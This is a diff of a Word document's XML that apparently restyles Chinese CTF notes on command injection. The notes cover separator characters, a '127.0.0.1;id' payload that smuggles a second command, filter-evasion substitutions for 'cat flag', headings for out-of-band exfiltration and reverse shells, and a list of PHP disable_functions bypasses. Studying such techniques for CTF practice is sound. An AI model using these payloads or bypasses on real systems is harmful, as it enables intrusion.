           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>常用替换表：</w:t>
@@ -12751,11 +12391,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`cat`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>cat</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12839,11 +12479,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`flag`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>flag</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12913,17 +12553,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>空格</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>空格：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12986,17 +12618,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>斜杠</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>斜杠：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13043,11 +12667,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`;`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13081,10 +12705,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`\</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>`\</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13096,7 +12719,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>行为：`**</w:t>
+        <w:t>行为：`</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13108,15 +12731,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>前者输出去哪：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>管道</w:t>
+        <w:t>前者输出去哪：管道</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13126,7 +12741,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>`\</w:t>
@@ -13162,11 +12776,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`&amp;&amp;`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>&amp;&amp;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13199,11 +12813,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`&amp;`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>&amp;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13236,18 +12850,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`%0a`（换行）</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>%0a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>（换行）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13289,10 +12903,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>为什么本题用 `|` 更好（实测耗时对比）：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">为什么本题用 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>|</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 更好（实测耗时对比）：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13301,11 +12929,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`127.0.0.1;id`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>127.0.0.1;id</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13337,15 +12965,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>耗时：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>3425 ms</w:t>
+        <w:t>耗时：3425 ms</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13367,10 +12987,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`\</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>`\</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13382,7 +13001,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>拼成的命令：id`**</w:t>
+        <w:t>拼成的命令：id`</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13416,10 +13035,39 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>原因：`|` 让 `ping -c 4` 立刻失败（不用等 4 秒），且它的 stdout 被管道吃掉。</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>原因：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>|</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 让 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ping -c 4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 立刻失败（不用等 4 秒），且它的 stdout 被管道吃掉。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13595,17 +13243,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**写文件</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>写文件</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13647,17 +13287,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**HTTP 外带</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>HTTP 外带</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13691,17 +13323,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**DNS 外带</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>DNS 外带</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13743,17 +13367,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**时间盲注</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>时间盲注</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13795,17 +13411,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**反弹 shell</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>反弹 shell</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13861,18 +13469,41 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`LD_PRELOAD` + `putenv` + `mail`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>LD_PRELOAD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>putenv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>mail</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13952,7 +13583,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>Apache Mod CGI</w:t>
@@ -14004,7 +13634,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>PHP-FPM / FastCGI</w:t>
@@ -14041,7 +13670,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>Shellshock</w:t>
@@ -14092,11 +13720,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`imap_open`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>imap_open</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14144,18 +13772,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**`pcntl_exec`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>pcntl_exec</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14167,15 +13788,81 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
+        <w:t xml:space="preserve">原理：常被忘在 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>disable_functions</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 之外</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>前提：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>pcntl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 扩展</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>Windows COM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
         <w:t>原理：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>常被忘在 `disable_functions` 之外</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>new COM("WScript.Shell")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14187,22 +13874,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>前提：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>pcntl</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 扩展</w:t>
+        <w:t>前提：Windows</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14211,11 +13883,26 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>Windows COM</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>putenv</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>error_log</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14227,15 +13914,35 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>原理：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>new COM("WScript.Shell")</w:t>
+        <w:t>原理：同 LD_PRELOAD 思路</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 的 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>enable -f</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14247,7 +13954,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>前提：Windows</w:t>
+        <w:t>原理：加载自定义内建命令</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14256,61 +13963,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`putenv` + `error_log`</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>原理：同 LD_PRELOAD 思路</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`bash` 的 `enable -f`</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>原理：加载自定义内建命令</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`win32std`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>win32std</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14367,17 +14024,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>场景</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>场景：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14417,17 +14066,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>原理</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>原理：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14527,7 +14168,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>实测结果：</w:t>
@@ -14559,7 +14199,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>这是"只有 filter 时"的终极解法。</w:t>
@@ -14587,17 +14226,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>**不拼字符串</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
